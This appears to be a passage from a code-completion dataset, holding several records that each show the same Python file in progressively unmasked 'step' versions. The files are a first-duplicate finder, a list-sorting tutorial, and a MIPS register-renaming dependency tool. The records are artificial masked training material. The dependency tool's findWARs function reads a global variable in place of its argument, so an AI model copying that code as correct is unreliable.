0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0]\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
def firstDuplicate(array): """ Time O(n) | Space O(n) """ dic = {} for num in array: if num in dic: return num else: dic[num] = True return -1 print(firstDuplicate([2, 1, 3, 5, 3]))
normal
{ "blob_id": "47259844f76f12060f0cf52f1086c05b9f300175", "index": 8581, "step-1": "<mask token>\n", "step-2": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\n<mask token>\n", "step-3": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\nprint(firstDuplicate([2, 1, 3, 5, 3]))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# The sort() method sorts the list ascending by default. #syntax # list.sort(reverse=True|False, key=myFunc) # Parameter Description # reverse Optional. reverse=True will sort the list descending. Default is reverse=False # key Optional. A function to specify the sorting criteria(s) cars = ['Ford', 'BMW','ea','Volvo'] cars.sort() print(cars) print() cars.sort(reverse = True) print(cars) print() # Sort the list by the length of the values: def length(data): return len(data) cars.sort(key= length) print(cars) print() cars.sort(key= lambda x : x[1]) print(cars) #each item in the iterable is passed into the function individually # Sort a list of dictionaries based on the "year" value of the dictionaries: cars = [ {'car': 'Ford', 'year': 2005}, {'car': 'Mitsubishi', 'year': 2000}, {'car': 'BMW', 'year': 2019}, {'car': 'VW', 'year': 2011} ] def year(data): return data['year'] cars.sort(key=year) print(cars) print() # Sort the list by the length of the values and reversed: cars = ['Ford', 'Mitsubishi', 'BMW', 'VW'] def length_of_cars(car): return len(car) cars.sort(reverse= True, key= length_of_cars) print(cars)
normal
{ "blob_id": "5ab8d9eab30d72557f1a85b5b82c0df456e3843d", "index": 1740, "step-1": "<mask token>\n\n\ndef length_of_cars(car):\n return len(car)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef length(data):\n return len(data)\n\n\n<mask token>\n\n\ndef year(data):\n return data['year']\n\n\n<mask token>\n\n\ndef length_of_cars(car):\n return len(car)\n\n\n<mask token>\n", "step-3": "<mask token>\ncars.sort()\nprint(cars)\nprint()\ncars.sort(reverse=True)\nprint(cars)\nprint()\n\n\ndef length(data):\n return len(data)\n\n\ncars.sort(key=length)\nprint(cars)\nprint()\ncars.sort(key=lambda x: x[1])\nprint(cars)\n<mask token>\n\n\ndef year(data):\n return data['year']\n\n\ncars.sort(key=year)\nprint(cars)\nprint()\n<mask token>\n\n\ndef length_of_cars(car):\n return len(car)\n\n\ncars.sort(reverse=True, key=length_of_cars)\nprint(cars)\n", "step-4": "cars = ['Ford', 'BMW', 'ea', 'Volvo']\ncars.sort()\nprint(cars)\nprint()\ncars.sort(reverse=True)\nprint(cars)\nprint()\n\n\ndef length(data):\n return len(data)\n\n\ncars.sort(key=length)\nprint(cars)\nprint()\ncars.sort(key=lambda x: x[1])\nprint(cars)\ncars = [{'car': 'Ford', 'year': 2005}, {'car': 'Mitsubishi', 'year': 2000},\n {'car': 'BMW', 'year': 2019}, {'car': 'VW', 'year': 2011}]\n\n\ndef year(data):\n return data['year']\n\n\ncars.sort(key=year)\nprint(cars)\nprint()\ncars = ['Ford', 'Mitsubishi', 'BMW', 'VW']\n\n\ndef length_of_cars(car):\n return len(car)\n\n\ncars.sort(reverse=True, key=length_of_cars)\nprint(cars)\n", "step-5": "# The sort() method sorts the list ascending by default.\n\n\n#syntax\n# list.sort(reverse=True|False, key=myFunc)\n\n# Parameter\t Description\n# reverse\t Optional. reverse=True will sort the list descending. Default is reverse=False\n# key\t Optional. A function to specify the sorting criteria(s)\n\ncars = ['Ford', 'BMW','ea','Volvo']\ncars.sort()\nprint(cars)\nprint()\ncars.sort(reverse = True)\nprint(cars)\nprint()\n\n# Sort the list by the length of the values:\n\ndef length(data):\n return len(data)\n\ncars.sort(key= length)\nprint(cars)\n\nprint()\n\ncars.sort(key= lambda x : x[1])\nprint(cars)\n\n#each item in the iterable is passed into the function individually \n\n# Sort a list of dictionaries based on the \"year\" value of the dictionaries:\n\ncars = [\n {'car': 'Ford', 'year': 2005},\n {'car': 'Mitsubishi', 'year': 2000},\n {'car': 'BMW', 'year': 2019},\n {'car': 'VW', 'year': 2011}\n]\n\ndef year(data):\n return data['year']\n\ncars.sort(key=year)\nprint(cars)\nprint()\n\n# Sort the list by the length of the values and reversed:\n\ncars = ['Ford', 'Mitsubishi', 'BMW', 'VW']\n\ndef length_of_cars(car):\n return len(car)\n\ncars.sort(reverse= True, key= length_of_cars)\nprint(cars)\n", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
from terminaltables import AsciiTable import copy table_data = [ ['WAR', 'WAW'], ['S1 -> S2: R1', 'row1 column2'], ['row2 column1', 'row2 column2'], ['row3 column1', 'row3 column2'] ] table = AsciiTable(table_data) def getDependenceStr(ins1, ins2, reg): return f"{ins1} -> {ins2}: {reg}" def getInstructionStr(ins, reg1, reg2, reg3): return f"{ins} {reg1} {reg2} {reg3}" def getInstructionArr(ins): return ins.split(' ') def validateInput(str): if str.strip() == '': return True return len(str.split()) == 4 def getInstructionFromUser(insNum): ins = input(f"S{insNum}: ") while not validateInput(ins): print("The value instruction you entered is invalid. Please try again") print("Remember the instruction must be in the format:" "ins Reg1 Reg2 Reg3 ") ins = input(f"S{insNum}: ") return ins def findDependencies(instructions): dependencies = {'waw': findWAWs(instructions), 'war': findWARs(instructions), 'trueDeps': findTrueDependencies(instructions)} return dependencies def findWAWs(instructions): waws = {} insDict = {} i = 1 for ins in instructions: insDict[f'S{i}'] = ins i += 1 workingIns = copy.deepcopy(insDict) for (key, value) in insDict.items(): insParts = value.split() del workingIns[key] for (key2, otherIns) in workingIns.items(): if insParts[1] == otherIns.split()[1]: waws[f'{key} -> {key2}'] = insParts[1] break # Find only the first occurance of a waw return waws def findWARs(ins): wars = {} insDict = {} i = 1 for ins in instructions: insDict[f'S{i}'] = ins i += 1 workingIns = copy.deepcopy(insDict) for (key, value) in insDict.items(): insParts = value.split() del workingIns[key] for (key2, otherIns) in workingIns.items(): if insParts[2] == otherIns.split()[1]: wars[f'{key} -> {key2}'] = insParts[2] if insParts[3] == otherIns.split()[1]: wars[f'{key} -> {key2}'] = insParts[3] return wars def findTrueDependencies(ins): trueDeps = {} for i in range(len(ins)-1, -1, -1): ins1 = ins[i].split() for k in range(2, len(ins1), 1): checkReg = ins1[k] for s in range(i-1, -1, -1): ins2 = ins[s].split() if checkReg == ins2[1]: trueDeps[f'S{s+1} -> S{i+1}'] = checkReg break return trueDeps def resolveDependencies(instructions, dependencies): waws = dependencies['waw'] wars = dependencies['war'] trueDeps = dependencies['trueDeps'] insDict = {} i = 1 for ins in instructions: insDict[f'S{i}'] = ins i += 1 tNum = 0 # Resolve WAWs for (dependence, reg) in waws.items(): depParts = dependence.split() insParts = insDict[depParts[0]].split() try: # Check true dependence trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg) if trueDepsExist: trueDepParts = trueDep.split() ins1 = insDict[trueDepParts[0]].split() ins2 = insDict[trueDepParts[2]].split() ins1ChangeIndex = ins1.index(reg) ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg] ins1[ins1ChangeIndex] = f'T{tNum}' for index in ins2ChangeIndex: if index != 1: ins2[index] = f'T{tNum}' insDict[trueDepParts[0]] = ' '.join(ins1) insDict[trueDepParts[2]] = ' '.join(ins2) else: changeIndex = insParts.index(reg) insParts[changeIndex] = f'T{tNum}' insDict[depParts[0]] = ' '.join(insParts) tNum += 1 except ValueError: pass # Resolve WARs for (dependence, reg) in wars.items(): depParts = dependence.split() insParts = insDict[depParts[0]].split() try: changeIndex = insParts.index(reg) insParts[changeIndex] = f'T{tNum}' insDict[depParts[0]] = ' '.join(insParts) tNum += 1 except ValueError: pass return insDict def checkTrueDep(falseDep, trueDeps, reg): # for waws depArr = falseDep.split() for (trueDep, reg2) in trueDeps.items(): trueDepArr = trueDep.split() if depArr[0] == trueDepArr[0] and reg == reg2: return (True, trueDep) return (None, None) def parseDepDictToTableData(dependenciesDict): tableData = [ ['WAW', 'WAR', 'True'] ] waws = dependenciesDict['waw'] wars = dependenciesDict['war'] trueDeps = dependenciesDict['trueDeps'] wawKeys = list(waws.keys()) warKeys = list(wars.keys()) trueDepKeys = list(trueDeps.keys()) maxLength = max([len(waws), len(wars), len(trueDeps)]) for i in range(0, maxLength): data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}' if i < len(wawKeys) else '', # Add WAW Dependencies f'{warKeys[i]} -> {wars[warKeys[i]]}' if i < len(warKeys) else '', # Add WAR Dependencies f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}' if i < len(trueDepKeys) else ''] # Add True Dependencies tableData.append(data) return tableData if __name__ == '__main__': numIns = 0 maxNumIns = 5 stop = False instructions = [] print("Enter up to 5 MIPs instructions below. When you're done simply" "press enter without typing in any input") print("Instructions must be in the format: ins Reg1 Reg2 Reg3") print("i.e. add R1 R2 R3") while numIns < maxNumIns and not stop: ins = getInstructionFromUser(numIns+1) if ins != '': instructions.append(ins) numIns += 1 else: stop = True # Genarate the table data need to show instructions given table_data = [ ['Given Instructions'], ] i = 1 for ins in instructions: table_data.append([f'S{i} - ' + ins]) i += 1 table = AsciiTable(table_data) print("Here are the instructions provided:") print('\n' + table.table + '\n') input("Press Enter find any existing false dependencies\n") dependenciesDict = findDependencies(instructions) table = AsciiTable(parseDepDictToTableData(dependenciesDict)) print('\n' + table.table + '\n') input("\nPress Enter to begin renaming registers") resolvedInstructions = resolveDependencies(instructions, dependenciesDict) resolvedInstructionsArr = [] for (key, value) in resolvedInstructions.items(): resolvedInstructionsArr.append(f'{key} - {value}') resolvedTableData = [ ['Resolved Instructions'] ] for ins in resolvedInstructionsArr: resolvedTableData.append([ins]) table = AsciiTable(resolvedTableData) print(table.table + '\n') input('Press Enter to continue') print('DONE!\n')
normal
{ "blob_id": "e045dc348fb2e9de51dbeada1d1826211cf89eae", "index": 3114, "step-1": "<mask token>\n\n\ndef getDependenceStr(ins1, ins2, reg):\n return f'{ins1} -> {ins2}: {reg}'\n\n\ndef getInstructionStr(ins, reg1, reg2, reg3):\n return f'{ins} {reg1} {reg2} {reg3}'\n\n\n<mask token>\n\n\ndef validateInput(str):\n if str.strip() == '':\n return True\n return len(str.split()) == 4\n\n\ndef getInstructionFromUser(insNum):\n ins = input(f'S{insNum}: ')\n while not validateInput(ins):\n print('The value instruction you entered is invalid. Please try again')\n print(\n 'Remember the instruction must be in the format:ins Reg1 Reg2 Reg3 '\n )\n ins = input(f'S{insNum}: ')\n return ins\n\n\n<mask token>\n\n\ndef resolveDependencies(instructions, dependencies):\n waws = dependencies['waw']\n wars = dependencies['war']\n trueDeps = dependencies['trueDeps']\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n tNum = 0\n for dependence, reg in waws.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg)\n if trueDepsExist:\n trueDepParts = trueDep.split()\n ins1 = insDict[trueDepParts[0]].split()\n ins2 = insDict[trueDepParts[2]].split()\n ins1ChangeIndex = ins1.index(reg)\n ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg]\n ins1[ins1ChangeIndex] = f'T{tNum}'\n for index in ins2ChangeIndex:\n if index != 1:\n ins2[index] = f'T{tNum}'\n insDict[trueDepParts[0]] = ' '.join(ins1)\n insDict[trueDepParts[2]] = ' '.join(ins2)\n else:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n for dependence, reg in wars.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n return insDict\n\n\ndef checkTrueDep(falseDep, trueDeps, reg):\n depArr = falseDep.split()\n for trueDep, reg2 in trueDeps.items():\n trueDepArr = trueDep.split()\n if depArr[0] == trueDepArr[0] and reg == reg2:\n return True, trueDep\n return None, None\n\n\ndef parseDepDictToTableData(dependenciesDict):\n tableData = [['WAW', 'WAR', 'True']]\n waws = dependenciesDict['waw']\n wars = dependenciesDict['war']\n trueDeps = dependenciesDict['trueDeps']\n wawKeys = list(waws.keys())\n warKeys = list(wars.keys())\n trueDepKeys = list(trueDeps.keys())\n maxLength = max([len(waws), len(wars), len(trueDeps)])\n for i in range(0, maxLength):\n data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}' if i < len(wawKeys) else\n '', f'{warKeys[i]} -> {wars[warKeys[i]]}' if i < len(warKeys) else\n '', f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}' if i <\n len(trueDepKeys) else '']\n tableData.append(data)\n return tableData\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef getDependenceStr(ins1, ins2, reg):\n return f'{ins1} -> {ins2}: {reg}'\n\n\ndef getInstructionStr(ins, reg1, reg2, reg3):\n return f'{ins} {reg1} {reg2} {reg3}'\n\n\ndef getInstructionArr(ins):\n return ins.split(' ')\n\n\ndef validateInput(str):\n if str.strip() == '':\n return True\n return len(str.split()) == 4\n\n\ndef getInstructionFromUser(insNum):\n ins = input(f'S{insNum}: ')\n while not validateInput(ins):\n print('The value instruction you entered is invalid. Please try again')\n print(\n 'Remember the instruction must be in the format:ins Reg1 Reg2 Reg3 '\n )\n ins = input(f'S{insNum}: ')\n return ins\n\n\n<mask token>\n\n\ndef findWAWs(instructions):\n waws = {}\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n workingIns = copy.deepcopy(insDict)\n for key, value in insDict.items():\n insParts = value.split()\n del workingIns[key]\n for key2, otherIns in workingIns.items():\n if insParts[1] == otherIns.split()[1]:\n waws[f'{key} -> {key2}'] = insParts[1]\n break\n return waws\n\n\n<mask token>\n\n\ndef findTrueDependencies(ins):\n trueDeps = {}\n for i in range(len(ins) - 1, -1, -1):\n ins1 = ins[i].split()\n for k in range(2, len(ins1), 1):\n checkReg = ins1[k]\n for s in range(i - 1, -1, -1):\n ins2 = ins[s].split()\n if checkReg == ins2[1]:\n trueDeps[f'S{s + 1} -> S{i + 1}'] = checkReg\n break\n return trueDeps\n\n\ndef resolveDependencies(instructions, dependencies):\n waws = dependencies['waw']\n wars = dependencies['war']\n trueDeps = dependencies['trueDeps']\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n tNum = 0\n for dependence, reg in waws.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg)\n if trueDepsExist:\n trueDepParts = trueDep.split()\n ins1 = insDict[trueDepParts[0]].split()\n ins2 = insDict[trueDepParts[2]].split()\n ins1ChangeIndex = ins1.index(reg)\n ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg]\n ins1[ins1ChangeIndex] = f'T{tNum}'\n for index in ins2ChangeIndex:\n if index != 1:\n ins2[index] = f'T{tNum}'\n insDict[trueDepParts[0]] = ' '.join(ins1)\n insDict[trueDepParts[2]] = ' '.join(ins2)\n else:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n for dependence, reg in wars.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n return insDict\n\n\ndef checkTrueDep(falseDep, trueDeps, reg):\n depArr = falseDep.split()\n for trueDep, reg2 in trueDeps.items():\n trueDepArr = trueDep.split()\n if depArr[0] == trueDepArr[0] and reg == reg2:\n return True, trueDep\n return None, None\n\n\ndef parseDepDictToTableData(dependenciesDict):\n tableData = [['WAW', 'WAR', 'True']]\n waws = dependenciesDict['waw']\n wars = dependenciesDict['war']\n trueDeps = dependenciesDict['trueDeps']\n wawKeys = list(waws.keys())\n warKeys = list(wars.keys())\n trueDepKeys = list(trueDeps.keys())\n maxLength = max([len(waws), len(wars), len(trueDeps)])\n for i in range(0, maxLength):\n data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}' if i < len(wawKeys) else\n '', f'{warKeys[i]} -> {wars[warKeys[i]]}' if i < len(warKeys) else\n '', f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}' if i <\n len(trueDepKeys) else '']\n tableData.append(data)\n return tableData\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef getDependenceStr(ins1, ins2, reg):\n return f'{ins1} -> {ins2}: {reg}'\n\n\ndef getInstructionStr(ins, reg1, reg2, reg3):\n return f'{ins} {reg1} {reg2} {reg3}'\n\n\ndef getInstructionArr(ins):\n return ins.split(' ')\n\n\ndef validateInput(str):\n if str.strip() == '':\n return True\n return len(str.split()) == 4\n\n\ndef getInstructionFromUser(insNum):\n ins = input(f'S{insNum}: ')\n while not validateInput(ins):\n print('The value instruction you entered is invalid. Please try again')\n print(\n 'Remember the instruction must be in the format:ins Reg1 Reg2 Reg3 '\n )\n ins = input(f'S{insNum}: ')\n return ins\n\n\ndef findDependencies(instructions):\n dependencies = {'waw': findWAWs(instructions), 'war': findWARs(\n instructions), 'trueDeps': findTrueDependencies(instructions)}\n return dependencies\n\n\ndef findWAWs(instructions):\n waws = {}\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n workingIns = copy.deepcopy(insDict)\n for key, value in insDict.items():\n insParts = value.split()\n del workingIns[key]\n for key2, otherIns in workingIns.items():\n if insParts[1] == otherIns.split()[1]:\n waws[f'{key} -> {key2}'] = insParts[1]\n break\n return waws\n\n\n<mask token>\n\n\ndef findTrueDependencies(ins):\n trueDeps = {}\n for i in range(len(ins) - 1, -1, -1):\n ins1 = ins[i].split()\n for k in range(2, len(ins1), 1):\n checkReg = ins1[k]\n for s in range(i - 1, -1, -1):\n ins2 = ins[s].split()\n if checkReg == ins2[1]:\n trueDeps[f'S{s + 1} -> S{i + 1}'] = checkReg\n break\n return trueDeps\n\n\ndef resolveDependencies(instructions, dependencies):\n waws = dependencies['waw']\n wars = dependencies['war']\n trueDeps = dependencies['trueDeps']\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n tNum = 0\n for dependence, reg in waws.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg)\n if trueDepsExist:\n trueDepParts = trueDep.split()\n ins1 = insDict[trueDepParts[0]].split()\n ins2 = insDict[trueDepParts[2]].split()\n ins1ChangeIndex = ins1.index(reg)\n ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg]\n ins1[ins1ChangeIndex] = f'T{tNum}'\n for index in ins2ChangeIndex:\n if index != 1:\n ins2[index] = f'T{tNum}'\n insDict[trueDepParts[0]] = ' '.join(ins1)\n insDict[trueDepParts[2]] = ' '.join(ins2)\n else:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n for dependence, reg in wars.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n return insDict\n\n\ndef checkTrueDep(falseDep, trueDeps, reg):\n depArr = falseDep.split()\n for trueDep, reg2 in trueDeps.items():\n trueDepArr = trueDep.split()\n if depArr[0] == trueDepArr[0] and reg == reg2:\n return True, trueDep\n return None, None\n\n\ndef parseDepDictToTableData(dependenciesDict):\n tableData = [['WAW', 'WAR', 'True']]\n waws = dependenciesDict['waw']\n wars = dependenciesDict['war']\n trueDeps = dependenciesDict['trueDeps']\n wawKeys = list(waws.keys())\n warKeys = list(wars.keys())\n trueDepKeys = list(trueDeps.keys())\n maxLength = max([len(waws), len(wars), len(trueDeps)])\n for i in range(0, maxLength):\n data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}' if i < len(wawKeys) else\n '', f'{warKeys[i]} -> {wars[warKeys[i]]}' if i < len(warKeys) else\n '', f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}' if i <\n len(trueDepKeys) else '']\n tableData.append(data)\n return tableData\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\ndef getDependenceStr(ins1, ins2, reg):\n return f'{ins1} -> {ins2}: {reg}'\n\n\ndef getInstructionStr(ins, reg1, reg2, reg3):\n return f'{ins} {reg1} {reg2} {reg3}'\n\n\ndef getInstructionArr(ins):\n return ins.split(' ')\n\n\ndef validateInput(str):\n if str.strip() == '':\n return True\n return len(str.split()) == 4\n\n\ndef getInstructionFromUser(insNum):\n ins = input(f'S{insNum}: ')\n while not validateInput(ins):\n print('The value instruction you entered is invalid. Please try again')\n print(\n 'Remember the instruction must be in the format:ins Reg1 Reg2 Reg3 '\n )\n ins = input(f'S{insNum}: ')\n return ins\n\n\ndef findDependencies(instructions):\n dependencies = {'waw': findWAWs(instructions), 'war': findWARs(\n instructions), 'trueDeps': findTrueDependencies(instructions)}\n return dependencies\n\n\ndef findWAWs(instructions):\n waws = {}\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n workingIns = copy.deepcopy(insDict)\n for key, value in insDict.items():\n insParts = value.split()\n del workingIns[key]\n for key2, otherIns in workingIns.items():\n if insParts[1] == otherIns.split()[1]:\n waws[f'{key} -> {key2}'] = insParts[1]\n break\n return waws\n\n\ndef findWARs(ins):\n wars = {}\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n workingIns = copy.deepcopy(insDict)\n for key, value in insDict.items():\n insParts = value.split()\n del workingIns[key]\n for key2, otherIns in workingIns.items():\n if insParts[2] == otherIns.split()[1]:\n wars[f'{key} -> {key2}'] = insParts[2]\n if insParts[3] == otherIns.split()[1]:\n wars[f'{key} -> {key2}'] = insParts[3]\n return wars\n\n\ndef findTrueDependencies(ins):\n trueDeps = {}\n for i in range(len(ins) - 1, -1, -1):\n ins1 = ins[i].split()\n for k in range(2, len(ins1), 1):\n checkReg = ins1[k]\n for s in range(i - 1, -1, -1):\n ins2 = ins[s].split()\n if checkReg == ins2[1]:\n trueDeps[f'S{s + 1} -> S{i + 1}'] = checkReg\n break\n return trueDeps\n\n\ndef resolveDependencies(instructions, dependencies):\n waws = dependencies['waw']\n wars = dependencies['war']\n trueDeps = dependencies['trueDeps']\n insDict = {}\n i = 1\n for ins in instructions:\n insDict[f'S{i}'] = ins\n i += 1\n tNum = 0\n for dependence, reg in waws.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n trueDepsExist, trueDep = checkTrueDep(dependence, trueDeps, reg)\n if trueDepsExist:\n trueDepParts = trueDep.split()\n ins1 = insDict[trueDepParts[0]].split()\n ins2 = insDict[trueDepParts[2]].split()\n ins1ChangeIndex = ins1.index(reg)\n ins2ChangeIndex = [i for i, x in enumerate(ins2) if x == reg]\n ins1[ins1ChangeIndex] = f'T{tNum}'\n for index in ins2ChangeIndex:\n if index != 1:\n ins2[index] = f'T{tNum}'\n insDict[trueDepParts[0]] = ' '.join(ins1)\n insDict[trueDepParts[2]] = ' '.join(ins2)\n else:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n for dependence, reg in wars.items():\n depParts = dependence.split()\n insParts = insDict[depParts[0]].split()\n try:\n changeIndex = insParts.index(reg)\n insParts[changeIndex] = f'T{tNum}'\n insDict[depParts[0]] = ' '.join(insParts)\n tNum += 1\n except ValueError:\n pass\n return insDict\n\n\ndef checkTrueDep(falseDep, trueDeps, reg):\n depArr = falseDep.split()\n for trueDep, reg2 in trueDeps.items():\n trueDepArr = trueDep.split()\n if depArr[0] == trueDepArr[0] and reg == reg2:\n return True, trueDep\n return None, None\n\n\ndef parseDepDictToTableData(dependenciesDict):\n tableData = [['WAW', 'WAR', 'True']]\n waws = dependenciesDict['waw']\n wars = dependenciesDict['war']\n trueDeps = dependenciesDict['trueDeps']\n wawKeys = list(waws.keys())\n warKeys = list(wars.keys())\n trueDepKeys = list(trueDeps.keys())\n maxLength = max([len(waws), len(wars), len(trueDeps)])\n for i in range(0, maxLength):\n data = [f'{wawKeys[i]} -> {waws[wawKeys[i]]}' if i < len(wawKeys) else\n '', f'{warKeys[i]} -> {wars[warKeys[i]]}' if i < len(warKeys) else\n '', f'{trueDepKeys[i]} -> {trueDeps[trueDepKeys[i]]}' if i <\n len(trueDepKeys) else '']\n tableData.append(data)\n return tableData\n\n\nif __name__ == '__main__':\n numIns = 0\n maxNumIns = 5\n stop = False\n instructions = []\n print(\n \"Enter up to 5 MIPs instructions below. When you're done simplypress enter without typing in any input\"\n )\n print('Instructions must be in the format: ins Reg1 Reg2 Reg3')\n print('i.e. add R1 R2 R3')\n while numIns < maxNumIns and not stop:\n ins = getInstructionFromUser(numIns + 1)\n if ins != '':\n instructions.append(ins)\n numIns += 1\n else:\n stop = True\n table_data = [['Given Instructions']]\n i = 1\n for ins in instructions:\n table_data.append([f'S{i} - ' + ins])\n i += 1\n table = AsciiTable(table_data)\n print('Here are the instructions provided:')\n print('\\n' + table.table + '\\n')\n input('Press Enter find any existing false dependencies\\n')\n dependenciesDict = findDependencies(instructions)\n table = AsciiTable(parseDepDictToTableData(dependenciesDict))\n print('\\n' + table.table + '\\n')\n input('\\nPress Enter to begin renaming registers')\n resolvedInstructions = resolveDependencies(instructions, dependenciesDict)\n resolvedInstructionsArr = []\n for key, value in resolvedInstructions.items():\n resolvedInstructionsArr.append(f'{key} - {value}')\n resolvedTableData = [['Resolved Instructions']]\n for ins in resolvedInstructionsArr:\n resolvedTableData.append([ins])\n table = AsciiTable(resolvedTableData)\n print(table.table + '\\n')\n input('Press Enter to continue')\n print('DONE!\\n')\n", "step-5": "from terminaltables import AsciiTable\nimport copy\n\ntable_data = [\n ['WAR', 'WAW'],\n ['S1 -> 